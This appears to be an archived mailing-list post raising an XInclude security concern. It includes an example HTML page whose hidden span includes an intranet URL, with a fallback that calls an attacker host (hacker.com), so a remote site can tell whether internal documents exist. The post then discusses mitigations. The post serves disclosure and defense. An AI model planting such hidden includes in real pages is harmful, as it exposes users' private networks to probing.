[
Lists Home |
Date Index |
Thread Index
]
Consider the following document:
<html xmlns:xi="http://www.w3.org/2001/XInclude">
<body>
Here's what the user normally sees
</body>
<span style="display: none">
<xi:include parse="text" href="http://www.behindthefirewall.com/someURL">
<xi:fallback href="http://www.hacker.com/?someURL=doesNotExist">
</xi:fallback>
</xi:include>
</span>
<html>
Once a local user has loaded this into a web browser from behind the
firewall, the original host site or some other remote site can easily
determine whether some document exists on some server that would not
normally be accessible to it. This scheme is not perfectly reliable.
The biggest problem is that the attacker must have some good guesses
as to likely local URLs, and also some reason to want to know them;
but it seems to have the potential to expose information from behind
the firewall that the user might not wish exposed.
How bad is this? Does this do anything a hacker can't do with IMG
tags or external entity references now? I do think this is worse than
those cases because fallbacks let the result of the load be
communicated back to the original host (or a different one). The
remote host can determine whether or not the request succeeded based
on whether or not the fallback is requested.
Combined with JavaScript and DHTML, this attack could become a lot
more effective. If the browser exposes the post-include DOM to any
such technology, then this would allow the remote site to gather
information from normally restricted pages on the Intranet. I'm not
sure how plausible that is. The comments of some JavaScript experts
would be helpful. Java normally does not allow applets to load URLs
other than the applet host for precisely this reason. However, if
the data from those URLs could be loaded into the local page by some
other mechanism, and then Java or JavaScript could get access to
them, this would punch a huge hole in the firewall.
Partly this depends on browser security models. However, I suspect
it's at least bad enough that browser vendors and other XInclude
users should be made aware of the issues, and perhaps not XInclude by
default; or perhaps it would be enough just not to fallback. Or
perhaps not make the post-inclusion DOM available through scripting.
Or limit the URLs included to ones from the same host as the base
page came from. Thoughts?
--
+-----------------------+------------------------+-------------------+
| Elliotte Rusty Harold | elharo@metalab.unc.edu | Writer/Programmer |
+-----------------------+------------------------+-------------------+
| XML in a Nutshell, 2nd Edition (O'Reilly, 2002) |
| http://www.cafeconleche.org/books/xian2/ |
| http://www.amazon.com/exec/obidos/ISBN%3D0596002920/cafeaulaitA/ |
+----------------------------------+---------------------------------+
| Read Cafe au Lait for Java News: http://www.cafeaulait.org/ |
| Read Cafe con Leche for XML News: http://www.cafeconleche.org/ |
+----------------------------------+---------------------------------+
|